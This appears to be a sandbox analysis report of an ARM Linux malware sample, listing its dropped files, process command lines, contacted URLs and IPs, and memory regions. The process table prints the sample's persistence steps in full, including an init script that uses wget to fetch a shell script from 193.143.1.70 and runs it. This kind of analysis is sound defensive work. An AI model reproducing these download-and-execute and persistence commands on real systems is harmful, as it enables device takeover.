Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
arm.nn.elf
|
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/arm.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/tmp/qemu-open.9pivYo (deleted)
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/arm.nn.elf
|
/tmp/arm.nn.elf
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf
&\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping
arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n
exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/arm.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/arm.nn.elf
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/lib/systemd/systemd-user-runtime-dir
|
/lib/systemd/systemd-user-runtime-dir stop 127
|
There are 47 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
daisy.ubuntu.com
|
162.213.35.25
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
113.42.94.38
|
unknown
|
Japan
|
||
|
96.245.140.72
|
unknown
|
United States
|
||
|
62.143.23.252
|
unknown
|
Germany
|
||
|
78.251.147.18
|
unknown
|
France
|
||
|
116.95.174.235
|
unknown
|
China
|
||
|
219.114.195.125
|
unknown
|
Japan
|
||
|
199.56.29.243
|
unknown
|
United States
|
||
|
14.188.157.232
|
unknown
|
Viet Nam
|
||
|
153.180.57.238
|
unknown
|
Japan
|
||
|
223.252.154.100
|
unknown
|
China
|
||
|
125.79.2.134
|
unknown
|
China
|
||
|
58.109.213.228
|
unknown
|
Australia
|
||
|
95.4.79.123
|
unknown
|
Turkey
|
||
|
170.117.87.174
|
unknown
|
United States
|
||
|
34.223.160.0
|
unknown
|
United States
|
||
|
93.234.227.6
|
unknown
|
Germany
|
||
|
193.236.21.163
|
unknown
|
Portugal
|
||
|
16.126.203.160
|
unknown
|
United States
|
||
|
84.62.211.219
|
unknown
|
Germany
|
||
|
169.214.26.150
|
unknown
|
Korea Republic of
|
||
|
217.1.234.6
|
unknown
|
Germany
|
||
|
217.118.118.50
|
unknown
|
United Kingdom
|
||
|
42.29.90.88
|
unknown
|
Korea Republic of
|
||
|
201.126.227.149
|
unknown
|
Mexico
|
||
|
139.41.28.196
|
unknown
|
United States
|
||
|
35.75.143.9
|
unknown
|
United States
|
||
|
78.95.81.177
|
unknown
|
Saudi Arabia
|
||
|
33.182.100.211
|
unknown
|
United States
|
||
|
20.159.149.139
|
unknown
|
United States
|
||
|
206.69.165.70
|
unknown
|
United States
|
||
|
34.224.71.193
|
unknown
|
United States
|
||
|
44.22.207.172
|
unknown
|
United States
|
||
|
114.12.251.223
|
unknown
|
Indonesia
|
||
|
29.193.34.93
|
unknown
|
United States
|
||
|
16.228.53.142
|
unknown
|
United States
|
||
|
144.69.94.0
|
unknown
|
United States
|
||
|
107.91.229.145
|
unknown
|
United States
|
||
|
24.247.224.32
|
unknown
|
United States
|
||
|
43.93.107.173
|
unknown
|
Japan
|
||
|
89.29.142.34
|
unknown
|
Spain
|
||
|
93.44.79.175
|
unknown
|
Italy
|
||
|
52.146.193.102
|
unknown
|
United States
|
||
|
196.210.230.123
|
unknown
|
South Africa
|
||
|
146.98.126.28
|
unknown
|
United States
|
||
|
5.168.22.236
|
unknown
|
Italy
|
||
|
144.75.35.66
|
unknown
|
United States
|
||
|
152.64.89.16
|
unknown
|
United States
|
||
|
54.164.156.159
|
unknown
|
United States
|
||
|
34.93.140.228
|
unknown
|
United States
|
||
|
145.24.98.160
|
unknown
|
Netherlands
|
||
|
196.219.241.149
|
unknown
|
Egypt
|
||
|
157.229.220.96
|
unknown
|
United States
|
||
|
5.79.13.93
|
unknown
|
United Kingdom
|
||
|
134.59.102.63
|
unknown
|
France
|
||
|
119.178.205.183
|
unknown
|
China
|
||
|
59.42.177.161
|
unknown
|
China
|
||
|
193.143.1.70
|
unknown
|
unknown
|
||
|
158.27.168.27
|
unknown
|
United States
|
||
|
196.108.34.85
|
unknown
|
Kenya
|
||
|
11.229.197.253
|
unknown
|
United States
|
||
|
13.93.243.221
|
unknown
|
United States
|
||
|
171.165.76.33
|
unknown
|
United States
|
||
|
96.140.91.201
|
unknown
|
United States
|
||
|
4.81.84.186
|
unknown
|
United States
|
||
|
132.44.10.96
|
unknown
|
United States
|
||
|
52.229.186.29
|
unknown
|
United States
|
||
|
55.233.236.242
|
unknown
|
United States
|
||
|
30.99.249.157
|
unknown
|
United States
|
||
|
58.94.45.118
|
unknown
|
Japan
|
||
|
54.38.112.39
|
unknown
|
France
|
||
|
35.112.162.251
|
unknown
|
United States
|
||
|
111.131.235.21
|
unknown
|
China
|
||
|
38.251.1.250
|
unknown
|
United States
|
||
|
158.97.154.183
|
unknown
|
Mexico
|
||
|
52.133.174.83
|
unknown
|
United States
|
||
|
83.95.142.237
|
unknown
|
Denmark
|
||
|
142.215.194.170
|
unknown
|
Canada
|
||
|
8.127.39.119
|
unknown
|
United States
|
||
|
39.100.181.187
|
unknown
|
China
|
||
|
61.7.205.48
|
unknown
|
Thailand
|
||
|
17.37.238.73
|
unknown
|
United States
|
||
|
126.151.67.26
|
unknown
|
Japan
|
||
|
13.117.221.17
|
unknown
|
United States
|
||
|
6.97.112.6
|
unknown
|
United States
|
||
|
4.165.94.152
|
unknown
|
United States
|
||
|
15.206.178.249
|
unknown
|
United States
|
||
|
86.49.187.94
|
unknown
|
Czech Republic
|
||
|
21.234.101.137
|
unknown
|
United States
|
||
|
78.13.158.116
|
unknown
|
Italy
|
||
|
4.219.97.39
|
unknown
|
United States
|
||
|
133.206.37.49
|
unknown
|
Japan
|
||
|
17.29.255.58
|
unknown
|
United States
|
||
|
105.149.104.187
|
unknown
|
Morocco
|
||
|
4.55.97.175
|
unknown
|
United States
|
||
|
46.92.3.160
|
unknown
|
Germany
|
||
|
130.162.94.251
|
unknown
|
United States
|
||
|
29.239.188.165
|
unknown
|
United States
|
||
|
218.5.207.20
|
unknown
|
China
|
||
|
222.248.231.198
|
unknown
|
China
|
||
|
15.98.115.150
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7f99f8033000
|
page execute read
|
|
||
|
7f99f8033000
|
page execute read
|
|
||
|
7f99f803b000
|
page read and write
|
|||
|
55adc8070000
|
page execute read
|
|||
|
55adc82c1000
|
page read and write
|
|||
|
55adc8070000
|
page execute read
|
|||
|
7f9afdae4000
|
page read and write
|
|||
|
55adcb8a6000
|
page read and write
|
|||
|
7f99f803f000
|
page read and write
|
|||
|
7f9afd978000
|
page read and write
|
|||
|
7f9afcaee000
|
page read and write
|
|||
|
7f9afdff4000
|
page read and write
|
|||
|
7f9afdfd0000
|
page read and write
|
|||
|
55adc82ca000
|
page read and write
|
|||
|
7f9afd955000
|
page read and write
|
|||
|
7f9afcaee000
|
page read and write
|
|||
|
7ffef853c000
|
page read and write
|
|||
|
55adc82ca000
|
page read and write
|
|||
|
7f9afd2f6000
|
page read and write
|
|||
|
7ffef85e0000
|
page execute read
|
|||
|
7f9afdea7000
|
page read and write
|
|||
|
55adcb8a6000
|
page read and write
|
|||
|
55adca2c8000
|
page execute and read and write
|
|||
|
7f9af8021000
|
page read and write
|
|||
|
7f99f8044000
|
page read and write
|
|||
|
7f9afd955000
|
page read and write
|
|||
|
7f9afd978000
|
page read and write
|
|||
|
7f99f803f000
|
page read and write
|
|||
|
7f9af8021000
|
page read and write
|
|||
|
55adca2df000
|
page read and write
|
|||
|
7f9afe039000
|
page read and write
|
|||
|
7f9af7fff000
|
page read and write
|
|||
|
55adca2df000
|
page read and write
|
|||
|
7f9afdff4000
|
page read and write
|
|||
|
7ffef85e0000
|
page execute read
|
|||
|
7f9afd388000
|
page read and write
|
|||
|
7f9afd6ea000
|
page read and write
|
|||
|
7f9afd6ea000
|
page read and write
|
|||
|
7f9afd388000
|
page read and write
|
|||
|
7f9afdfd0000
|
page read and write
|
|||
|
7f9afdcc6000
|
page read and write
|
|||
|
7f9afd2f6000
|
page read and write
|
|||
|
7ffef853c000
|
page read and write
|
|||
|
7f9afe039000
|
page read and write
|
|||
|
7f99f803b000
|
page read and write
|
|||
|
7f9afdae4000
|
page read and write
|
|||
|
7f9af7fff000
|
page read and write
|
|||
|
7f9afdcc6000
|
page read and write
|
|||
|
55adca2c8000
|
page execute and read and write
|
|||
|
7f9afdea7000
|
page read and write
|
|||
|
55adc82c1000
|
page read and write
|
There are 41 hidden memdumps, click here to show them.